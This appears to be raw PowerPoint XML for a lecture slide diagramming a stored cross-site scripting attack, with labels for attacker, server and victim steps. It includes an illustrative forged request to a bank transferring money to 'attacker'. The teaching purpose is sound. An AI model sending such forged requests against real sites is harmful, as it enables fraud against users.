                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="1904451" y="4678952"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="363538" y="6522011"/>
            <a:ext cx="8707437" cy="335989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF8000"/>
          </a:solidFill>
          <a:ln w="19049">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="27940" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="220"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>E.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://bank.com/sendmoney?to=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CN" sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>&amp;amt=100000</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5541962" y="1539240"/>
            <a:ext cx="2522855" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Browser/Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="object 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6876546" y="2696972"/>
            <a:ext cx="1506220" cy="506095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="600075">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" spc="-5" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B7C1EB"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="2130"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7618413" y="5400376"/>
            <a:ext cx="728345" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Stores  the  script!</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Title 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35568E2C-277A-0A4A-9190-716BCF4D037D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{326C83E9-4C3B-6B47-8F79-15D273A28536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7085965" y="2696972"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.com</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01625" y="3901440"/>
            <a:ext cx="1290955" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2738120" cy="958850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2738120" h="958850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738079" y="958251"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957734" y="4865417"/>
            <a:ext cx="122523" cy="89237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="3122839" y="4088279"/>
            <a:ext cx="1780337" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-172" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="2399357" y="4595477"/>
            <a:ext cx="2600061" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>receive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-145" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="-2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="-2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713093" y="3703693"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="176405" y="365013"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="128133" y="356784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83746" y="336104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47596" y="305546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20826" y="267291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4580" y="223518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229" y="128133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28908" y="83745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59466" y="47595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97721" y="20826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141495" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236879" y="8229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299433" y="42302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344187" y="97721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364325" y="166047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364061" y="201666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336104" y="281267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305547" y="317417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267292" y="344186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223518" y="360433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176405" y="365013"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713093" y="3703693"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8229" y="128133"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="28908" y="83745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59466" y="47595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97721" y="20826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141495" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236879" y="8229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299433" y="42302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344187" y="97721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364325" y="166047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364061" y="201666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356784" y="236879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336104" y="281267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305547" y="317417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267292" y="344186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223518" y="360433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176405" y="365013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128133" y="356784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83746" y="336104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47596" y="305546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20826" y="267291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4580" y="223518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229" y="128133"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2778214" y="3757967"/>
            <a:ext cx="290497" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084502" y="4086339"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084502" y="4086339"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
